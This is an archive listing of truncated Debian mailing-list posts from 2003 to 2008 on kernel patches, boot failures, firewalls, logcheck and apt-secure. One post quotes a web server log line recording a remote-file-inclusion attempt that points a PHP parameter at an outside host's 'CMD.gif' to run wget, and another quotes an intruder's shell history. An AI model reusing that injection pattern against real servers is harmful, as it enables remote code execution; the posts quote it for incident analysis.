On Mon, 25 Aug 2008, Jonas Smedegaard wrote:
> +1021_new-style_firewire.patch
etch+half kernel has old ieee1394, no need for that one.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
On Mon, Aug 25, 2008 at 12:26 PM, Jonas Smedegaard <[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> On Mon, Aug 25, 2008 at 04:29:39PM +0800, James Andrewartha wrote:
>>Package: yaird
>>Version: 0.0.12-18
>>Severity: important
>>
>>This is bug 431534, exposed again b
On Wed, Jan 23, 2008 at 08:29:25AM -0700, Michael Loftis wrote:
>
> It's better to leave the service disabled, or even better, completely
> uninstalled from a security standpoint, and from a DoS standpoint as well.
> The Linux kernel isn't very efficient at processing firewall rules. Newer
> k
hello harald,
On Sun, Mar 11, 2007 at 01:43:21PM +0100, Harald Krammer wrote:
> Hi maximilian,
> thanks, that's it.
top posting is a bad ml reply style
http://www.caliburn.nl/topposting.html
> How about to set it as default behavior?
isn't the answer quite obvious!?
anyway this is ot here and
hello,
On Sun, Mar 11, 2007 at 10:53:34AM +0100, Harald Krammer wrote:
> Hi!
> I saw new behavior in Debian / Etch and I am not sure what I should
> think about.
> If the boot-up fails to mount the root-disk then I will get a root
> console without any password authentication. Is it easy possible
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 495
> "http://85.214.18.193
On Fri, Jun 09, 2006 at 07:47:45AM -0400, Brent Clark wrote:
> Hey all
>
> I seem to be experiencing problems booting up (Thank goodness for Knoppix)
>
> There are a host of errors, but the end message is:
>
> Target filesystem doesn't have /sbin/init
> /bin/sh: can't access tty; job control tur
On Sun, 19 Sep 2004, martin f krafft wrote:
> also sprach Noah Meyerhans <[EMAIL PROTECTED]> [2004.09.19.2219 +0200]:
> > As an additional point against these scripts, they are host based.
> > If I'm going to bother blackholing the source of these login
> > attempts, I'm going to do it at the bord
On Mon, 16 Aug 2004, LeVA wrote:
> Hi!
>
> Is the debian patched kernels are preferred for server/desktop use, or
> they are just minor cosmetic patches? what is the difference between
> the kernel.org's kernel source and the debian patched kernel sources?
long version read debian/changelog of
Package: logcheck
Version: 1.2.16
Severity: wishlist
Tags: patch
hello steve kemp,
this patches allows the user to _really_ write his own
files in ignore.d.violations
previous they had to have the prefix logcheck-,
which isn't handy, not documented and therefor seems to be a bug ..
took some ti
Package: logcheck
Version: 1.2.16
Severity: wishlist
Tags: patch
hello steve kemp,
this patches allows the user to _really_ write his own
files in ignore.d.violations
previous they had to have the prefix logcheck-,
which isn't handy, not documented and therefor seems to be a bug ..
took some ti
On Thu, 27 Nov 2003, Camillo Särs wrote:
> I am using apt-secure, but it's not part of stable. What's the real
> plan
> for apt-secure, will it be standard in the next major release? AFAIK,
> there are many wrinkles to be ironed out...
i agree that it would be nice to have the choice of an
On Thu, 27 Nov 2003, Camillo Särs wrote:
> I am using apt-secure, but it's not part of stable. What's the real
> plan
> for apt-secure, will it be standard in the next major release? AFAIK,
> there are many wrinkles to be ironed out...
i agree that it would be nice to have the choice of an
hi,
i checked almost all DSA since woody release (DSA > 133)
the resume is: on a clean exposed sarge install the vast
majority of DSA is resolved, but you better not run
kde, sendmail, mysql, perl (cgi), php, tomcat or imagemagick.
you'll find below the report listing security alerts affecting
hi,
i checked almost all DSA since woody release (DSA > 133)
the resume is: on a clean exposed sarge install the vast
majority of DSA is resolved, but you better not run
kde, sendmail, mysql, perl (cgi), php, tomcat or imagemagick.
you'll find below the report listing security alerts affecting
On Thu, 18 Sep 2003, Christian Storch wrote:
> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
On Thu, 18 Sep 2003, Christian Storch wrote:
> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
17 matches
Mail list logo